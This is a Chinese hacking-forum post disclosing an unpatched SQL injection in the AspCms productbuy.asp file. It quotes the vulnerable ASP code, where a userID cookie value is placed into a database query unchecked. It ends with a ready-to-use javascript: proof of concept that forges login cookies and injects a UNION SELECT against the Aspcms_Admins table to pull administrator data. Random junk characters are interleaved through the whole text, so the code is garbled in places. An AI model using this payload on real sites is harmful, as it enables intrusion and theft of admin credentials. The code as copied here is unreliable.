好久没上土司了,上来一看发现在删号名单内.....: N/ t1 S% B: z& g# q
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。. ?1 k; O: {) Z ^5 `
废话不多说,看代码:, }% P. d7 M/ {
: X6 u: k9 j. \<%
' @" x. y( x' p% [
, I% } T. ?* K. Sif action = "buy" then6 N8 L3 \* @2 `8 ~% }# ^" G
# ~8 K; t) }! K
addOrder()
9 B0 | G. N& S, m
$ k. E9 F( D, ?" ^) m6 jelse$ \) x) `) g' w5 ]- [/ l- U
( m' T0 M7 ?- p2 l1 \" t echoContent()
9 G$ M- O/ z: \* i+ Z6 j8 a
8 g6 Q" {0 z8 L; Cend if. K5 v3 O# y: K1 I+ r: ]' `1 J
8 U5 P/ ]4 ^) i3 N! _" w& p0 S/ q" ?
3 M! L' y5 w9 M" E……略过+ h/ {0 h" q$ \1 c" h+ t
" t- m. v7 G, g7 n8 H' Y$ G$ y1 @. z4 J# \ s
! @. B8 v, `0 U+ S& u2 _" Q
Sub echoContent()7 k: u4 d8 F* ~3 W4 e
3 ^8 y' ?8 e) s- s2 X. ~ t dim id
1 n3 ?5 `8 c1 D8 |! t4 z: f6 o/ ]9 x, T- x% b( [
id=getForm("id","get")
8 k: n& N2 {8 S9 V: |* B
% b3 C9 y- z' R. P- w
/ _+ r; T8 n! z1 g! ^1 H% }
. Z9 @/ z' L$ q0 f. y0 I if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
/ l5 L7 ^4 [$ P9 _* O4 n* c
, r8 l1 T) \+ i1 i+ @
6 C, N4 [! i }. K0 i- Q
* w9 {" s8 I: q' g' m0 r5 g dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
' \1 X A3 \# L4 O& a0 i7 c$ S1 v, D# Z' c X' P4 C. O+ Z o
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
: h( s) A. m( Q7 Q2 V5 K
7 ]- T8 [' W4 X7 M* A Dim templatePath,tempStr
* e8 o; x, u5 A4 D7 r. L
- H; ` m9 v, J( [% G templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
# |# |2 t5 n' Z& B; V k, M$ r$ m" C- X5 N7 m- J' [, }
( B0 Y1 c- s' d2 [5 s( r& n8 ~1 R! s+ x8 d3 v9 j3 r" v, |/ A
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
* o6 O# \, t; {/ s: C3 [
" C5 r% u' F; V4 Z selectproduct=rsObj(0)) H. ]5 D( h0 {8 U; R
3 ?5 `" T# b: E; p2 W
# k- _$ M% @# o! P$ E( u! x9 @; w( `
Dim linkman,gender,phone,mobile,email,qq,address,postcode& r) }6 c1 M4 M1 f( S* k
: z r* T3 [; N4 ?) d ~" I if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0" x* T! Q6 a8 t% K
) k2 x$ y. X0 L' t' _0 ] if rCookie("loginstatus")=1 then + @+ q# U2 q; q
' P' ?: G, x' L2 v/ F
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
, `! f; G1 m! p- F, T
/ }+ e2 s. j3 h$ _; Q4 \ linkman=rsObj("truename")
% E3 z0 q! `0 K1 l& u
. O! k- {& H0 g9 E4 G* {% e gender=rsObj("gender")* T8 o. {! j1 {9 N
' C6 y: p: {1 v- j5 i
phone=rsObj("phone")! g0 z( y0 r( I" }
' o: j$ f0 i. Q2 f
mobile=rsObj("mobile")
# H1 t& O2 V& }: K" j
1 h- W+ k, V+ f' M email=rsObj("email")$ }3 F) Q+ p3 R! {- c# |+ B3 Z' O
$ q0 X, V) J8 c
qq=rsObj("qq")
- V* L# g5 v2 K/ V$ r7 C1 h
; s" y6 f$ Z" o* u8 p* v address=rsObj("address")$ v( L' X5 r A4 F) q& S
, [+ p8 n8 F" j2 V
postcode=rsObj("postcode"); | L' ` T8 |+ V6 b, q
: o; B3 D/ A3 K, R; F3 r3 Y else
" K4 d5 d" F% r- d+ J7 x5 R2 [6 h: }+ [& d: C" G
gender=15 r5 ~& ~5 p% q \ p! G2 u4 j, M
4 B( f7 P/ Y4 P4 X- P" T
end if% Z5 p3 p- t% U& d: D3 {3 |) [( x; U- a
$ a& _, D% }$ c) Y! _+ Y
rsObj.close(): C1 S0 S2 W! G, Q4 m
# u. Y; \. Q$ a. c0 b1 Y
. n; D6 p s: c: M
. i6 {- o) n- j with templateObj ( M' t0 Y s8 M6 ^2 B
. n$ l2 V o: K$ b3 v0 e2 |+ x
.content=loadFile(templatePath)
+ |1 ~& i1 p0 e) Y5 X' {/ K* E2 b
.parseHtml()
* r( _3 M5 j9 V; w# g4 z
+ z4 c6 E8 n. _" n1 B5 g2 c8 ~ .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
+ C7 c& {# t4 ?5 U# v3 N
0 v3 \% S) h) R .content=replaceStr(.content,"[aspcms:linkman]",linkman)
6 b3 I* g" W/ ^& a" J* w! F& j) M" I I- f/ l
.content=replaceStr(.content,"[aspcms:gender]",gender) , `5 c) B% T8 W: E& q9 P) n
1 ^& |1 E, O: e
.content=replaceStr(.content,"[aspcms:phone]",phone) 3 B/ X) o- ?8 ?/ j/ O$ U3 Q
; ?0 [) I, m N7 a/ w .content=replaceStr(.content,"[aspcms:mobile]",mobile) ) F- J& o* n9 @ k) _
; I, `3 X8 @. d .content=replaceStr(.content,"[aspcms:email]",email) n) e; z' p# \
) O% A& H' h4 t4 l0 o4 F3 g! R .content=replaceStr(.content,"[aspcms:qq]",qq) : b9 N: v2 P1 I% p
2 x' H0 S$ P3 f
.content=replaceStr(.content,"[aspcms:address]",address) * \+ X' I5 Y) k8 q) X i
% D& q |: c6 J .content=replaceStr(.content,"[aspcms:postcode]",postcode)
6 G, S3 K, p n/ f& s& H9 A4 y% z! A* T: b
.parseCommon() # r1 e% H% n# D# R
0 ], l: F$ m$ X6 ~0 E j# g echo .content . O2 E8 u+ D$ c: v# m$ M$ k
5 q1 |. ?* L9 y3 o Z) \9 Z
end with
, J( q6 f/ \0 f8 k# G$ ^: x! K+ y# g$ C0 J& J) f2 G
set templateobj =nothing : terminateAllObjects
I! K2 Z4 k9 V0 |5 C
3 _; y4 r3 l# N7 l+ K7 m5 aEnd Sub7 c, y! G0 s, I6 T4 A
漏洞很明显,没啥好说的* S' D9 l9 V9 j3 v* D% M
poc:
5 \, I' r2 f3 B) D, Y0 D2 O/ S6 A2 c6 c1 D7 P# T' n7 F, y: o. ?
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子. M" @* [' g! V6 J& t: z
9 d Q x. i" e: s* F, J" f |
发表于 2012-12-27 08:35:05
收藏
支持
反对